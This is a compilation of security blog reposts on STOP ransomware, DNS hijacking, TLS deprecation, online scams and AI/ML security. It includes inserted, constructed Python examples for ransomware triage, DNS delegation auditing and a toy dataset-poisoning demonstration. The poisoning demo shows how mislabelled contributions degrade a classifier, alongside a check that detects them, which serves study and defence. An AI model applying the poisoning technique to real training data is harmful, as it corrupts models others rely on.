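        target = base / rel
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_bytes(data)
    return base


def run_sample() -> dict:
    """Build the constructed tree in a temporary directory and triage it."""
    with tempfile.TemporaryDirectory() as tmp:
        return triage_tree(build_sample_tree(tmp))


if __name__ == "__main__":
    report = run_sample()
    print("personal IDs found:", report["ids"])
    for folder, pid in report["notes"].items():
        print(f"note in {folder}: {pid}")
    for path, original in report["encrypted"]:
        print(f"encrypted {path} (was {original})")
    print("folders with encrypted files but no note:", report["unnoted_folders"])
```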

What if I have been infected by STOP?

Tampering with the encrypted files may permanently damage them, and the chances of guessing the correct decryption key are virtually zero. The only sure way to regain access to your data is to restore everything from backup.

Restoring data is time consuming and (sometimes) complicated – and you need a full backup of all your files and applications too. If you do not currently back up your data, now is the time to start.

Alternatively, you could pay the ransom. Bear in mind however that you are dealing with criminals who may increase the ransom again. Or steal your money without supplying a decryption key at all.

Some technical sources suggest that STOP can be reversed, but you will need to seek advice from an expert. As always, these services are unlikely to offer any form of guarantee of success and you could still lose all your data.

Protecting against STOP ransomware infections

Preventing STOP ransomware infections is possible if you do the following:

  1. Install anti-malware protection. Panda Dome Advanced provides security tools that block STOP and other ransomware from installing on your computer. Download a free trial now to get started.
  2. Avoid warez and crack websites. Using warez to steal software is illegal – and these sites are notorious for hosting malware anyway. Paying for some software may be expensive, but it is far cheaper than losing all your files to a virus. Panda Dome can also be configured to block access to warez sites to protect you and your family.
  3. Take regular backups. Windows 10 and Mac OS both make it incredibly easy to take full backups of your machine. Once configured, your computer will take care of the rest. If something does go wrong in the future, you will have a copy of all your files ready to restore quickly.

Ransomware is very effective because it targets people who aren’t prepared. By installing anti-malware tools, checking your web surfing behaviour and performing routine data backups, you stand a very good chance of avoiding STOP infections.

The post STOP ransomware claims even more victims appeared first on Panda Security Mediacenter.

Security wellness takes more than a fad diet

Every year, millions of people make the same New Year’s resolution: to lose weight and improve health. But by February, a mere thirty days or so into the year, stats show 75 percent of us have fallen off the wagon. The pitfalls are many, whether the resolution is vague and broad, or we neglect to set measurable goals and regular check-ins, or perhaps we’re just not really ready for change. Achieving a true state of … More

The post Security wellness takes more than a fad diet appeared first on Help Net Security.

Is 2019 the year national privacy law is established in the US?

Data breaches and privacy violations are now commonplace. Unfortunately, the consequences for US companies involved can be complicated. A company’s obligation to a person affected by a data breach depends in part on the laws of the state where the person resides. A person may be entitled to free credit monitoring for a specified period of time or may have the right to be notified of the breach sooner than somebody living in another state. … More

The post Is 2019 the year national privacy law is established in the US? appeared first on Help Net Security.

88% of UK businesses breached during the last 12 months

The UK’s cyber threat environment is intensifying. Attacks are growing in volume, and the average number of breaches has increased, according to Carbon Black. Key survey research findings: 88% of UK organizations reported suffering a breach in the last 12 months The average number of breaches per organization over the past year was 3.67 87% of organizations have seen an increase in attack volumes 89% of organizations say attacks have become more sophisticated 93% of … More

The post 88% of UK businesses breached during the last 12 months appeared first on Help Net Security.

People still shocked by how easy it is to track someone online

Netflix’s hit series You has got people discussing their online privacy and traceability. However, McAfee, the device-to-cloud cybersecurity company, discovered less than a fifth (17%) of Brits who lost or had their phone stolen (43%) made any attempt to prevent criminals from accessing data stored on the device or in the cloud. Only 17% said they remotely locked or changed passwords and a mere 12% remotely erased data from the lost or stolen device to … More

The post People still shocked by how easy it is to track someone online appeared first on Help Net Security.

Revisiting How Registrants Can Reduce the Threat of Domain Hijacking

Recent events [1, 2] have shown the threat of domain hijacking is very real; however, it is also largely preventable. As Verisign previously noted [3], there are many security controls that registrants can utilize to help strengthen their security posture. Verisign would like to reiterate this advice within the context of the recent domain hijacking reports.

Domains are an important element of internet infrastructure; their functionality and security rely upon many factors such as their delegated name servers. Name server delegations introduce complex and subtle inter-dependencies between domains and their authoritative name servers. Compromise of any name server in the delegation hierarchy can lead to a potential hijacking scenario. Targeted name server compromises in the delegation hierarchy can facilitate a complete hijack of a domain or set of domains, while name server compromises deeper in the delegation hierarchy may result in partial hijacking, since not all name servers in the hierarchy are involved in every DNS resolution request. A compromised name server is capable of diverting DNS requests to malicious servers controlled by threat actors and can be weaponized for phishing attacks or other nefarious purposes.

Over the past several weeks, security professionals have issued reports [1, 2] about the hijacking of various domains via their name server delegations. These changes were likely made using compromised registrar credentials and are believed to be backed by a foreign nation state entity [1, 2]. During the attacks, the threat actors used the traffic directed to their infrastructure to launch spear phishing campaigns against various government entities in northern Africa and the Middle East. These targeted spear phishing attempts were facilitated by the transitive trust [4] placed on the compromised domains and their delegated name servers.

Several of the compromised domains contained hosts that were specified as name servers for numerous top-level domains (TLDs) including country code TLDs [5] in the northern African and Middle East regions. Subsequently, DNS traffic resolution for corresponding reliant zones was partially or completely routed to the threat actors’ infrastructure. This redirection of DNS traffic facilitated their ability to target specific government and industry entities in the targeted countries. While the domains did not employ a domain locking tool, some were DNSSEC [6] signed, which helped mitigate the attack for resolving parties that perform validation.

As part of the response to this incident, the Department of Homeland Security issued Emergency Directive 19-01 [7] requiring federal civilian agencies to address the risks presented by this activity. The order mandated four actions to be taken: 1) Audit DNS records, 2) Change DNS account passwords, 3) Add multi-factor authentication to DNS accounts and 4) Monitor Certificate Transparency logs.
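The first mandated action, auditing DNS records, applied to the delegation hierarchy described above, as an added Python example that is neither Verisign's nor DHS's code: it compares a zone's verified NS delegation and name server addresses against what is currently published, and classifies drift as partial (some name servers suspect) or complete (all of them) the way the text distinguishes the two. The zone name, name server hosts, addresses, the record-line format and the list of "compromised domains" are all constructed; that list stands in for domains an investigation has found to be under threat-actor control, so that transitive trust through them is flagged even when the delegation itself looks unchanged.

```python
"""Delegation audit: compare a zone's expected NS delegation and glue with what
is currently published, and classify drift as partial or complete hijack.
Added example; every record and name below is constructed."""
from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    zone: str
    kind: str    # ns-added | ns-removed | glue-changed | ns-in-compromised-domain | partial-hijack | complete-hijack
    detail: str


def parse_delegation(zone: str, text: str) -> dict:
    """Parse constructed zone-file style lines ('OWNER TYPE RDATA', ';' comments)
    into {ns_host: frozenset(addresses)} for the NS hosts of `zone`."""
    ns_hosts, addrs = {}, {}
    for raw in text.splitlines():
        line = raw.split(";")[0].strip()
        if not line:
            continue
        owner, rtype, rdata = line.split()
        owner, rdata = owner.lower(), rdata.lower()
        if rtype.upper() == "NS" and owner == zone.lower():
            ns_hosts.setdefault(rdata, None)          # dict keeps insertion order
        elif rtype.upper() in ("A", "AAAA"):
            addrs.setdefault(owner, set()).add(rdata)
    return {ns: frozenset(addrs.get(ns, ())) for ns in ns_hosts}


def parent_domain(host: str) -> str:
    """'ns1.example.net.' -> 'example.net': the registrable domain whose registrar
    account controls this name server host (simplifying two-label assumption)."""
    labels = host.rstrip(".").split(".")
    return ".".join(labels[-2:])


def audit_delegation(zone, expected, observed, compromised_domains=frozenset()):
    """Return findings. A name server is suspect if it was not in the baseline,
    its addresses changed, or its own domain is on the compromised list
    (transitive trust). If every observed NS is suspect the zone is completely
    hijacked; otherwise only some resolutions reach the threat actor (partial)."""
    findings, suspect = [], set()
    exp_ns, obs_ns = set(expected), set(observed)
    for ns in sorted(obs_ns - exp_ns):
        findings.append(Finding(zone, "ns-added", ns))
        suspect.add(ns)
    for ns in sorted(exp_ns - obs_ns):
        findings.append(Finding(zone, "ns-removed", ns))
    for ns in sorted(exp_ns & obs_ns):
        if expected[ns] != observed[ns]:
            findings.append(Finding(zone, "glue-changed",
                                    f"{ns}: {sorted(expected[ns])} -> {sorted(observed[ns])}"))
            suspect.add(ns)
    for ns in sorted(obs_ns):
        if parent_domain(ns) in compromised_domains:
            findings.append(Finding(zone, "ns-in-compromised-domain", ns))
            suspect.add(ns)
    if suspect:
        kind = "complete-hijack" if suspect == obs_ns else "partial-hijack"
        findings.append(Finding(zone, kind, ", ".join(sorted(suspect))))
    return findings


ZONE = "example.com."
# Constructed baseline: what the registrant last verified at the registrar.
EXPECTED_TEXT = """
example.com.      NS  ns1.example.net.
example.com.      NS  ns2.example.net.
ns1.example.net.  A   192.0.2.10
ns2.example.net.  A   192.0.2.11
"""
# Constructed observation: one name server's address now points elsewhere.
OBSERVED_GLUE_MOVED = """
example.com.      NS  ns1.example.net.
example.com.      NS  ns2.example.net.
ns1.example.net.  A   198.51.100.7   ; changed from 192.0.2.10
ns2.example.net.  A   192.0.2.11
"""
# Constructed observation: the whole delegation was rewritten.
OBSERVED_REPLACED = """
example.com.        NS  ns1.rogue.example.
example.com.        NS  ns2.rogue.example.
ns1.rogue.example.  A   203.0.113.5
ns2.rogue.example.  A   203.0.113.6
"""

if __name__ == "__main__":
    expected = parse_delegation(ZONE, EXPECTED_TEXT)
    cases = (("glue moved", OBSERVED_GLUE_MOVED), ("delegation replaced", OBSERVED_REPLACED))
    for label, text in cases:
        print(f"== {label}")
        for f in audit_delegation(ZONE, expected, parse_delegation(ZONE, text)):
            print(f"  {f.kind:26} {f.detail}")
    print("== delegation unchanged, but example.net is known compromised")
    for f in audit_delegation(ZONE, expected, expected, {"example.net"}):
        print(f"  {f.kind:26} {f.detail}")
```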

Verisign is engaged with various industry and government entities regarding this incident and has provided technical insights into the DNS ecosystem regarding the complex mechanisms and system-to-system interactions/dependencies involved. To date, there is no evidence that the scope of compromise extends beyond the sets of credentials at various registrars.

Verisign encourages registrants to research their registrar’s security offerings and to take advantage of the tools and services they offer. Techniques such as locking services offered by registrars and registries [8], two-factor authentication, password strengthening, and other common security hygiene practices [9] are all best practice security recommendations that Verisign encourages and promotes.

Additional security recommendations are available in the following ICANN SSAC reports:

  • SAC040 [10]: “Measures to Protect Domain Name Registration Service Against Exploitation or Misuse”
  • SAC044 [11]: “A Registrant’s Guide to Protecting Domain Name Registration Accounts”
  • SAC074 [12]: “Best Practices for Preserving Security and Stability in the Credential Management Lifecycle”

[1] https://www.fireeye.com/blog/threat-research/2019/01/global-dns-hijacking-campaign-dns-record-manipulation-at-scale.html

[2] https://www.crowdstrike.com/blog/widespread-dns-hijacking-activity-targets-multiple-sectors/

[3] http://www.circleid.com/posts/20130722_how_registrants_can_reduce_the_threat_of_domain_hijacking/

[4] https://www.usenix.org/legacy/events/imc05/tech/full_papers/ramasubramanian/ramasubramanian_html/dns.html

[5] https://www.internic.net/domain/root.zone

[6] https://www.verisign.com/en_US/domain-names/dnssec/how-dnssec-works/index.xhtml

[7] https://cyber.dhs.gov/ed/19-01/

[8] https://www.verisign.com/en_US/channel-resources/domain-registry-products/registry-lock/index.xhtml

[9] https://www.markmonitor.com/download/checklist/MarkMonitor_Domain_Security_Best_Practices.pdf

[10] https://www.icann.org/en/system/files/files/sac-040-en.pdf

[11] https://www.icann.org/en/system/files/files/sac-044-en.pdf

[12] https://www.icann.org/en/system/files/files/sac-074-en.pdf

The post Revisiting How Registrants Can Reduce the Threat of Domain Hijacking appeared first on Verisign Blog.

A week in security (February 4 – 8)

Last week on Malwarebytes Labs, we took a closer look at the technical and reputational challenges for Facebook as it tries to integrate secure messaging across Messenger, WhatsApp, and Instagram. We explored Google’s latest attempts to change how the public sees—literally—web browser URLs, gave some of our best tips on how to safely browse the Internet at work, and detailed a unique spam campaign involving ebooks, the Amazon Kindle web store and… John Wick? Yep.

Other cybersecurity news

Stay safe, everyone!

The post A week in security (February 4 – 8) appeared first on Malwarebytes Labs.

Solving the TLS 1.0 problem

The use of Transport Layer Security (TLS) encryption for data in transit is a common way to help ensure the confidentiality and integrity of data transmitted between devices, such as a web server and a computer. However, in recent years older versions of the protocol have been shown to have vulnerabilities, and therefore their use should be deprecated.

We have been recommending the use of TLS 1.2 and above for some time. To help provide guidance, we are pleased to announce the release of the Solving the TLS 1.0 Problem, 2nd Edition white paper. The goal of this document is to provide the latest recommendations that can help remove technical blockers to disabling TLS 1.0 while at the same time increasing visibility into the impact of this change to your own customers. Completing such investigations can help reduce the business impact of the next security vulnerability in TLS 1.0.

In the second edition update we added the following:

  • Updates covering all of the new products and features Microsoft has shipped since the first version of the white paper, including IIS custom logging fields for weak TLS detection, TLS 1.2 backports to legacy OSes, and more.
  • Introduction of the Office 365 Secure Score Customer Reporting Portal to help Office 365 tenant admins quantify their customers' own weak TLS usage.
  • Much more detail on .NET recommendations and best practices to ensure the usage of TLS 1.2+.
  • Pointers to DevSkim rules for detection and prevention of TLS hardcoding.
  • Tips for using PowerShell with TLS 1.2.

Read the Solving the TLS 1.0 Problem, 2nd Edition white paper to learn more.

The post Solving the TLS 1.0 problem appeared first on Microsoft Secure.

Product showcase: Veriato Cerebral user & entity behavior analytics software

When it comes to identifying and stopping insider data security threats, actionable insights into people’s behaviors are invaluable. Employees involved in negative workplace events, contractors with access to critical systems and sensitive data, and departing employees all present elevated risks. Whether it’s a true insider exfiltrating data, or hackers leveraging compromised credentials to become an insider, behavior patterns can indicate both emerging and immediate risks to your security. Veriato Cerebral user & entity behavior analytics … More

The post Product showcase: Veriato Cerebral user & entity behavior analytics software appeared first on Help Net Security.

How can we improve adoption and ROI on security investments?

Traditionally, whenever employees are required to interact with security solutions, they push back because they don’t want their lives to be made more complicated with extra procedures and, essentially, clicks. Human behavior dictates that if there’s a tech roadblock, users will find a way around it to get their jobs done. In light of these work arounds, organizations often struggle to quantify how to reduce risk and improve compliance, which makes it harder to prove … More

The post How can we improve adoption and ROI on security investments? appeared first on Help Net Security.

Zero trust browsing: Protect your organization from its own users

To the casual observer, the cyberattack landscape is constantly shifting. In recent years, the threats and scams have evolved from Nigerian princes to stranded travelers, pop-ups warning of outdated software to ransomware, cryptojacking, phishing and spear phishing. Predictions for 2019 are full of dire warnings about the very-real explosion of phishing, backed by geometric increases in phishing sites as the number of malware sites drops. Just as 2018 predictions focused on cryptojacking and ransomware were … More

The post Zero trust browsing: Protect your organization from its own users appeared first on Help Net Security.

There’s a growing disconnect between data privacy expectations and reality

There is a growing disconnect between how companies capitalize on customer data and how consumers expect their data to be used, according to a global online survey commissioned by RSA Security. Consumer backlash in response to the numerous high-profile data breaches in recent years has exposed one of the hidden risks of digital transformation: loss of customer trust. According to the study, which surveyed more than 6,000 adults across France, Germany, the United Kingdom and … More

The post There’s a growing disconnect between data privacy expectations and reality appeared first on Help Net Security.

Average DDoS attack volumes grew by 194% in 12 months

The volume and complexity of DDoS attacks continued to grow in Europe during the final quarter of 2018, according to Link11. While Link11’s Security Operations Center (LSOC) registered 13,910 attacks in Q4 (12.7% down compared to Q3), the average attack volume grew by 8.7% to 5Gbps, and 59% of attacks used multiple attack vectors. Key findings of Link11’s Q4 DDoS report include: Average attack volumes grew by 194% in 12 months: In Q4 2018, average … More

The post Average DDoS attack volumes grew by 194% in 12 months appeared first on Help Net Security.

Valentine’s Alert: Don’t Let Scammers Break Your Heart or Your Bank Account

It’s hard to believe that as savvy as we’ve become about our tech, people are still getting catfished, scammed, and heartbroken in their pursuit of love online.

The dinner conversation between bystanders goes something like this: “How could anyone be so dumb? Seriously? If they are going to be that reckless and uninformed, then maybe they deserve what they got!”

Some friends and I recently had a similar conversation about online dating scams. I noticed, however, that one friend, Sarah*, wasn’t so eager to jump into the conversation. She shrunk back in the booth and quietly sipped her margarita. Only later did she share her story with me.

The power of love

Sarah, a single mom in her late 40s, well-educated, and attractive, had been convinced by her teenager to join a dating site the year before. She was especially lonely after her divorce three years earlier, so she agreed to create a profile on a popular dating app. After a handful of dates fell flat, she found Scott. He was charismatic, kind. “We had an instant connection,” according to Sarah. They spent hours on the phone sharing their deepest secrets and even started imagining a future together. But after about three months, Scott fell on hard times. At first, he needed to borrow $400 to pay for airfare to visit a dying relative, which he paid back immediately. Over the next few months, the numbers grew to $1,000 for rent and $3,000 for a business venture.

Before long, Sarah had loaned her new love over $8,500. When she pressed him to repay the money, Scott ghosted Sarah online, moved out of town, and she never saw him again. My friend didn’t share her story with many people. She didn’t report it. She was too embarrassed and humiliated and even became depressed following what she calls “the Scott scam.” Her trust in other people and in love itself has been obliterated.

Sarah’s story doesn’t just echo that of desperate, clueless people, or lonely older women. Scammers are targeting good people who still believe in and value love and companionship. The pursuit of love online extends to adults as well as teens.

Confidence Fraud

Law enforcement calls these kinds of online romance scams confidence fraud because scammers will take a considerable amount of time gaining the trust and confidence of their victims. They will appear empathetic and supportive as they gather personal information they can use over time to carry out their scam.

According to the Federal Bureau of Investigation (FBI), confidence fraud has jumped 20% in the past year despite reports and warnings — especially around this time of year.

The FBI’s Internet Crime Complaint Center (IC3) reports that romance scams top all other financial online crimes. In 2016, people reported almost 15,000 romance scams to IC3 (nearly 2,500 more than the previous year), with losses exceeding $230 million.

Tips for Safe Online Dating

Never send money. Be it a romantic relationship you’ve engaged with or a phishing email, no matter the sob story, do not send money to anyone online. If you do send money, put a loan agreement in place that is legally enforceable should one party default.

Suspicious behavior. If someone promises to meet you somewhere but keeps canceling or if he or she refuses to video chat, those are red flags. Technology means anyone from anywhere in the world can successfully maintain a scam.

Take things slow. If someone is pushing the pace of a relationship or too quick to declare love and talk about the future, pause and assess the situation.

Do a background check. Love is a powerful force and can easily cloud a person’s correct understanding of reality. If you dare to create a dating profile, make a deal with yourself that you will extend the same courage to doing a background check on someone.

Be a sleuth. Don’t be afraid to gather facts on someone you’ve met online. Simple steps such as Googling the person’s name or dropping their photo in Google’s Reverse Image Search will help you get a better understanding of a person. Have faith: Good, legitimate people do exist. However, if there’s anything dubious, it’s best to find it out earlier rather than later. Part of doing your homework is tracking down mutual friends and making inquiries about the person you are talking with online.

Keep your social profiles private. Experts agree that you should edit your online footprint before you start dating people you’ve met online. Making your Instagram, Twitter, and Facebook private will guard you against potential.

Never send racy photos. Some scammers gain the confidence of their victims with every intention of extorting them in the future. They will threaten to send any racy photos to your family, friends, or business associates. The best way to avoid this is to never, ever send racy photos to anyone.

Google yourself, restrict info. Google yourself to see if there are any digital breadcrumbs that give away your home address or phone number. If possible, delete or revise that info. Likewise, go through your social accounts and remove any personal information you’ve shared in the past. Digital stalking is a risk for people who date online so turn off GPS on your dating apps and make sure your profile information is vague. Even if you get comfortable online with others, never get too comfortable since apps have privacy loopholes that can easily be exploited by hackers.

Take solid precautions. Enlist at least one friend as your dating safety pal. This will be the person who knows where you are going, who you will be with, and the background on the person you are meeting. Ask that person to check in with you during the date, and carry pepper spray or a taser for physical protection. Go the extra step and turn on your Friend Finder or a location app that allows your safety friend to track your whereabouts during a date.

*Names have been changed

The post Valentine’s Alert: Don’t Let Scammers Break Your Heart or Your Bank Account appeared first on McAfee Blogs.

How Online Gamers Can Play It Safe

Online gaming has grown exponentially in recent years, and scammers have taken note. With the industry raking in over $100 billion in 2017 alone[1], the opportunity to funnel some money off through fraud or theft has proven irresistible to the bad guys, leaving gamers at greater risk.

From malware and phishing scams, to phony game hacks, identity theft, and more, gamers of all stripes now face a minefield of obstacles online and in real life. So, if you’re going to play games, it’s best to play it safe.

Here’s what to look out for:

Dodgy Downloads

Gamers who play on their computer or mobile device need to watch out for dangerous links or malicious apps disguised as popular or “free” games. Hackers often use innocent-looking downloads to deliver viruses and spyware, or even sign you up for paid services, without your consent. In one prominent case, more than 2.6 million Android users downloaded fake Minecraft apps that allowed hackers to take control of their devices.

Researchers have even discovered a ransomware threat that targets gamers. TeslaCrypt was designed to encrypt game-play data until a ransom is paid. Originally distributed through a malicious website, it has since been circulating via spam.

And while it’s true that game consoles like PlayStation and Xbox aren’t as vulnerable to viruses, since they are closed systems, that doesn’t mean that their users don’t face other risks.

Social Scams

Players on any platform could wind up with malware, sent directly from other players via chat messages. Some scammers use social engineering tricks, like inviting other players to download “helpful” tools that turn out to be malware instead. When you consider that 62% of kids play games where they speak to others, the odds of a risky interaction with a stranger seem quite real.

Players of the Origin and Steam services, for instance, were targeted by hackers posing as other players, inviting them to play on their teams. Over chat message, they suggested the players download an “audio tool” that turned out to be a keystroke logger, aimed at stealing their access credentials for the game.

Other social scams include malicious YouTube videos or websites, offering game bonuses and currency, for free.

Another widespread social threat is account takeover, or ATO for short. This is when a scammer hacks a real account in order to post spammy links, and scam messages that appear to come from a trusted contact. Some accounts, for games like League of Legends, have even been stolen and sold online for money because they boasted a high level, or rare skins.

Phishing

Finally, be on the lookout for phishing websites offering free games or bonuses, or phishy emails prompting you to log in to your account, with a link leading to a copycat gaming site. Often, these are designed to steal your login credentials or distribute fake games that contain malware.

Players of the wildly popular Fortnite, for example, have been particularly targeted. The latest phishing scam is aimed at stealing the third-party sign-in tokens that allow cybercriminals to access a user’s account, and the payment details associated with it.

So now that you know about a little more about gaming threats, here’s how to win at playing it safe:

  1. Do Your Research—Before downloading any games from the Internet or app stores, read other users’ reviews first to check that they are safe. The same goes for sites that sell game hacks, credits, patches, or virtual assets typically used to gain rank within a game. Avoid illegal file-sharing sites and “free” downloads, since these are often laced with malware. It’s always best to go for a safer, paid option from a reputable source.
  2. Play Undercover—Be very careful about sharing personal information, both in your profile and in your chat messages. Private information such as your full name, address, pet’s name, school, or work details could be used to guess the answers to your password-recovery questions, or even to impersonate you. Consider playing under an alias.
  3. Be Suspicious—Since scammers use the social aspect of games to fool people, keep your guard up when you receive messages from strangers, or even when reading reviews. Some YouTube and social media reviews are placed there to trick users into thinking that a game or asset is legitimate. Dig deep, and avoid looking for free hacks. Ask gamers you know in real life for recommendations that worked for them.
  4. Protect Yourself—Avoid using older versions of games, and make sure that the games you do play are updated with the latest patches and fixes. If you think a gaming account may already have been compromised, change its password immediately to something unique and complex. Safeguard your computers and devices from known and emerging threats by investing in comprehensive security software, and keep yourself up to date on the latest scams.

Looking for more mobile security tips and trends? Be sure to follow @McAfee_Home on Twitter, and like us on Facebook.

[1]According to The 2017 Year In Review Report by SuperData

The post How Online Gamers Can Play It Safe appeared first on McAfee Blogs.

Mild to medium volume expected for February 2019 Patch Tuesday

If you look at the recent Patch Tuesday lineups, we have seen the usual updates for the Microsoft Windows OS, browsers, and Office. In the last two months we have seen updates for .Net Framework and in the last four months we have seen updates for Exchange Server. For non-Microsoft updates we have a pre-notification from Adobe, but Oracle released their CPU in January and both Chrome and Firefox just released at the end of … More

The post Mild to medium volume expected for February 2019 Patch Tuesday appeared first on Help Net Security.

DevOps and DevSecOps developments to watch in 2019

Some predictions are more accurate than others. Last year, I was sure that serverless would finally overtake containers—but then 2018 turned out to be the year of Kubernetes. In the San Francisco Bay Area, you couldn’t throw a rock without hitting an engineer talking about Kubernetes (or cryptocurrency, but let’s not go there.) That’s not stopping me from offering a fresh batch of hot-off-the-press predictions about DevOps and DevSecOps for 2019. It’s finally the year … More

The post DevOps and DevSecOps developments to watch in 2019 appeared first on Help Net Security.

Infosec pros believe data isn’t secure in the cloud, despite desire for mass adoption

65 percent of infosecurity professionals would like to store object data in the cloud, but 47 percent either don’t believe or are not sure if data in the cloud is as secure as in their own data center, according to a study by Ponemon Institute. The study looks at perceptions around on-premise and cloud-based data storage technologies across 483 IT and IT security professionals familiar with the benefits of object storage technology. The primary reasons … More

The post Infosec pros believe data isn’t secure in the cloud, despite desire for mass adoption appeared first on Help Net Security.

Thousands Of Users Thrashed By Extremely Real-looking-Fake-Scans Scam

Thousands of users have run into a severe threat from scammers who use JavaScript and HTML, delivered by way of “Potentially Unwanted Applications” (PUAs), to display fake antivirus scans that look convincingly real.

Symantec, the security research organization that uncovered this development, classes it as a tech-support scam: the whole point is to frighten the victim into doing something they would never otherwise do.

Fake support calls gave way to PUAs some time ago; the latest twist is the shrewd use of JavaScript and HTML code to make the fake scan look genuine, so the scammers fool their victims faster and more easily. The scan pages borrow the branding of Symantec’s well-known Norton Security products.

These scams are in no way comparable to the crude and obvious antivirus scams that run every day. The scan looks so legitimate that it never occurs to the victim to question it. An alert pops up, and users take it to be a warning from an anti-malware application, when it is actually coming from the web browser. The hook is an offer to find the infection with a ten-second “scan”, which draws users in swiftly.

The scammers run a web-based dashboard to manage and monitor all the scams in progress. Thousands of dollars have been wrested from victims with what are, on inspection, basic and fake-looking contrivances.

The last three months of 2018 were busy for Symantec, which blocked PUA installations around 89 million times.

There are several points to keep in mind:

  • No pop-up in a browser is capable of analyzing your hard drive or the real files on it.
  • No anti-malware application asks you to download a separate application in order to update itself.
  • An alert that mentions the number of days left in your so-called “subscription” is the tell-tale sign of this scam; spotting it is the best way to stay safe from this kind of threat.

Microsoft Secure: Securing the future of AI and machine learning at Microsoft

Artificial intelligence (AI) and machine learning are making a big impact on how people work, socialize, and live their lives. As consumption of products and services built around AI and machine learning increases, specialized actions must be undertaken to safeguard not only your customers and their data, but also to protect your AI and algorithms from abuse, trolling, and extraction.

We are pleased to announce the release of a research paper, Securing the Future of Artificial Intelligence and Machine Learning at Microsoft, focused on net-new security engineering challenges in the AI and machine learning space, with a strong focus on protecting algorithms, data, and services. This content was developed in partnership with Microsoft’s AI and Research group. It’s referenced in The Future Computed: Artificial Intelligence and its role in society by Brad Smith and Harry Shum, and cited in Responsible bots: 10 guidelines for developers of conversational AI.

This document focuses entirely on security engineering issues unique to the AI and machine learning space, but due to the expansive nature of the InfoSec domain, it’s understood that the issues and findings discussed here will overlap to a degree with the domains of privacy and ethics. As this document highlights challenges of strategic importance to the tech industry, its target audience is security engineering leadership industry-wide.

Our early findings suggest that:

  1. Secure development and operations foundations must incorporate the concepts of Resilience and Discretion when protecting AI and the data under its control.
  • AI-specific pivots are required in many traditional security domains such as Authentication, Authorization, Input Validation, and Denial of Service mitigation.
  • Without investments in these areas, AI/machine learning services will continue to fight an uphill battle against adversaries of all skill levels.
  2. Machine learning models are largely unable to discern between malicious input and benign anomalous data. A significant source of training data is derived from un-curated, unmoderated public datasets that may be open to third-party contributions.
  • Attackers don’t need to compromise datasets when they are free to contribute to them. Such dataset poisoning attacks can go unnoticed while model performance inexplicably degrades.
  • Over time, low-confidence malicious data becomes high-confidence trusted data, provided that the data structure/formatting remains correct and the quantity of malicious data points is sufficiently high.
  3. Given the great number of layers of hidden classifiers/neurons that can be leveraged in a deep learning model, too much trust is placed in the output of AI/machine learning decision-making processes and algorithms without a critical understanding of how these decisions were reached.
  • AI/machine learning is increasingly used in support of high-value decision-making processes in medicine and other industries where the wrong decision may result in serious injury or death.
  • AI must have built-in forensic capabilities. This enables enterprises to provide customers with transparency and accountability for their AI, ensuring its actions are not only verifiably correct but also legally defensible.
  • When combined with data provenance/lineage tools, these capabilities can also function as an early form of AI intrusion detection, allowing engineers to determine the exact point in time at which a classifier made a decision, what data influenced it, and whether or not that data was trustworthy.
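The poisoning finding above (well-formed rows from an open contribution channel that are absorbed in small quantity and flip the model once there are enough of them) and the provenance point (knowing which rows drove a decision) can be shown on a toy classifier. The following is an added example written for this page, not code from Microsoft or the paper: a k-nearest-neighbour classifier trained on curated rows plus anonymous contributions, with a provenance check that scores each contributor's labels against a model trained on the curated rows alone. Every data point, label and contributor name is constructed for the example.

```python
"""Added example, not from the Microsoft paper: a k-nearest-neighbour classifier
fed from an open-contribution dataset.  It shows (1) that a handful of
mislabelled contributions is absorbed, (2) that enough of them flip the model's
decisions, and (3) a provenance check that scores each contributor against a
model trained on curated rows only.  All points, labels and contributor names
are constructed for the example."""
import math
from collections import Counter

K = 5  # neighbours consulted per prediction

# Curated rows: (x, y, label, contributor).  Benign cluster near (0, 0),
# malicious cluster near (4, 4).
CURATED = [
    (0.0, 0.0, "benign", "curated"), (0.5, 0.2, "benign", "curated"),
    (0.1, 0.6, "benign", "curated"), (0.3, 0.4, "benign", "curated"),
    (0.2, 0.3, "benign", "curated"), (0.6, 0.5, "benign", "curated"),
    (4.0, 4.0, "malicious", "curated"), (4.3, 3.8, "malicious", "curated"),
    (3.9, 4.4, "malicious", "curated"), (4.2, 4.1, "malicious", "curated"),
    (4.1, 4.2, "malicious", "curated"), (3.8, 3.9, "malicious", "curated"),
]
# Held-out clean test rows: (x, y, label).
TEST = [(0.2, 0.1, "benign"), (0.4, 0.5, "benign"),
        (4.1, 3.9, "malicious"), (3.8, 4.2, "malicious")]


def poison_rows(n, contributor="anon-pool"):
    """Label-flip contributions: correctly formatted rows placed inside the
    malicious cluster but labelled benign, submitted via the open channel."""
    return [(4.0 + 0.1 * (i % 4), 4.0 + 0.1 * (i // 4), "benign", contributor)
            for i in range(n)]


def predict(rows, x, y, k=K):
    """Majority label among the k rows closest to (x, y)."""
    nearest = sorted(rows, key=lambda r: math.dist((x, y), (r[0], r[1])))[:k]
    return Counter(r[2] for r in nearest).most_common(1)[0][0]


def accuracy(rows):
    """Accuracy of a model trained on `rows` against the clean test set."""
    hits = sum(predict(rows, x, y) == label for x, y, label in TEST)
    return hits / len(TEST)


def disagreement_by_contributor(rows, trusted):
    """Provenance check: for each contributor, the fraction of its rows whose
    label disagrees with a model trained on the trusted rows alone."""
    per = {}
    for contributor in sorted({r[3] for r in rows}):
        mine = [r for r in rows if r[3] == contributor]
        bad = sum(predict(trusted, x, y) != label for x, y, label, _ in mine)
        per[contributor] = bad / len(mine)
    return per


def flag_contributors(rows, trusted, threshold=0.5):
    """Contributors whose labels disagree with the trusted model more often
    than `threshold`; the flagged rows are the ones to quarantine."""
    return sorted(c for c, rate in disagreement_by_contributor(rows, trusted).items()
                  if rate > threshold)


if __name__ == "__main__":
    for n in (0, 2, 12):
        rows = CURATED + poison_rows(n)
        print(f"{n:2d} poisoned rows -> accuracy {accuracy(rows):.2f}, "
              f"flagged {flag_contributors(rows, CURATED)}")
```

With k = 5, two mislabelled rows cannot outvote the curated neighbours and accuracy stays at 1.0, which is the "goes unnoticed" phase; twelve of them outnumber the real malicious rows around the test points and accuracy drops to 0.5. The provenance check catches the contributor at either quantity, because it compares labels against a trusted baseline rather than waiting for accuracy to fall.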

Our goal is to bring awareness and energy to the issues highlighted in this paper while driving new research investigations and product security investments across Microsoft. Read the Securing the Future of Artificial Intelligence and Machine Learning at Microsoft paper to learn more.

The post Securing the future of AI and machine learning at Microsoft appeared first on Microsoft Secure.


Government, Private Sector Unprepared for 21st Century Cyber Warfare

